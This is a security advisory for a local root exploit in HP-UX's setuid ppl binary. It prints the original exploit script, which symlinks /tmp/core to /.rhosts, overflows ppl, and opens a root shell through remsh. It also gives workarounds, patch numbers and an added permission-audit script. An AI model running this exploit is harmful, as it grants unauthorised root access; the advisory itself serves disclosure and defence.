COMMAND

    /usr/bin/ppl (/bin/ppl)

SYSTEMS AFFECTED

    HP-UX 9.x, 10.x

PROBLEM

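    The ppl application is HP's version of SLIP, a Point-To-Point
    Serial Linking protocol for TCP/IP.  As you may remember, HP told
    us to apply a patch because the SoD people (Scriptors of Doom)
    had released an exploit.  That patch, PHNE_9771, was for all
    platforms with HP-UX release 10.20.  That's what HP gave us.  The
    SoD people have now given us another exploit, this time for this
    bloody patch.  The script links /tmp/core to /.rhosts and then
    runs the setuid-root ppl with a 2500-character argument string, so
    the resulting core file is written through the link with root
    privileges and leaves a "+ +" line in root's .rhosts.  Here is the
    original exploit.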


        #!/bin/ksh
        # SoD exploit the PHSS_9771 ppl patch (among others)
        # 2/13/97 - Honey is Bee Tea
        # Did I or did I not say "could probably make a link bug out of this"
        # in the previous exploit script for ppl?  Did you even bother to read it?
        cd /tmp
        rm core 2>/dev/null
        ln -s /.rhosts core
        perl -e '$file="A"x2500; exec {"/usr/bin/ppl"} "$file","\n+ +\n";'
        rm core
        remsh localhost -l root "echo + + > /.rhosts"
        remsh localhost -l root ksh -i

SOLUTION

    A temporary solution is to remove the setuid and execute permissions:

        # chmod 400 /usr/bin/ppl
        # ls -l /usr/bin/ppl
        -r--------   1 root bin        98304 Jan 24 08:13 /usr/bin/ppl

    If you wish to restrict ppl access instead, you can do so by
    creating a "trusted" group that contains the set of trusted
    users:

        # chgrp trusted /usr/bin/ppl
        # chmod 4550 /usr/bin/ppl
        # ls -l /usr/bin/ppl
        -r-sr-x---   1 root trusted    98304 Jan 24 08:13 /usr/bin/ppl

    The best solution is to apply the patch for your release:

        PHNE_13179 for all platforms with HP-UX releases 9.X,
        PHNE_13180 for all platforms with HP-UX releases 10.00 & 10.01,
        PHNE_13181 for all platforms with HP-UX release 10.10,
        PHNE_13182 for all platforms with HP-UX release 10.20,
        PHNE_12499 for all platforms with HP-UX release 10.30.
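
    To check which of the permission states above a host is in, the
    following script classifies an "ls -l" line for ppl.  It is an added
    example, not part of the original advisory or an HP tool; the helper
    names classify_ppl and audit_ppl are hypothetical and the "exposed"
    sample line is constructed.

```shell
#!/bin/sh
# Added example: map an `ls -l` line for ppl onto the states in SOLUTION.
# classify_ppl and audit_ppl are hypothetical helper names, not HP tools.

# classify_ppl "<ls -l line>" prints one of:
#   disabled           no setuid bit and no execute bits (chmod 400)
#   restricted:<group> setuid, runnable only by owner and <group> (chmod 4550)
#   exposed            setuid and executable by every local user
#   owner-only         setuid, no group/other execute
#   not-setuid         executable but without the setuid bit
classify_ppl() {
    read -r perms _links _owner group _rest <<EOF
$1
EOF
    u=$(printf '%s' "$perms" | cut -c4)    # owner execute slot (s/S = setuid)
    g=$(printf '%s' "$perms" | cut -c7)    # group execute slot
    o=$(printf '%s' "$perms" | cut -c10)   # other execute slot
    case $u in
        s|S)
            case $o in x|t) echo exposed; return 0 ;; esac
            case $g in x|s) echo "restricted:$group"; return 0 ;; esac
            echo owner-only ;;
        *)
            if [ "$u$g$o" = "---" ]; then echo disabled; else echo not-setuid; fi ;;
    esac
}

# audit_ppl [path] classifies the binary actually installed on this host.
# -L follows the /bin/ppl link so the real file's mode is reported.
audit_ppl() {
    path=${1:-/usr/bin/ppl}
    [ -e "$path" ] || { echo absent; return 0; }
    classify_ppl "$(ls -lL "$path")"
}

# Constructed sample: a setuid-root ppl that any user can execute.
SAMPLE_EXPOSED='-r-sr-xr-x   1 root bin        98304 Jan 24 08:13 /usr/bin/ppl'

printf 'sample: %s\n' "$(classify_ppl "$SAMPLE_EXPOSED")"
printf 'local:  %s\n' "$(audit_ppl)"
```

    A result of "exposed" on an unpatched host means neither workaround
    has been applied.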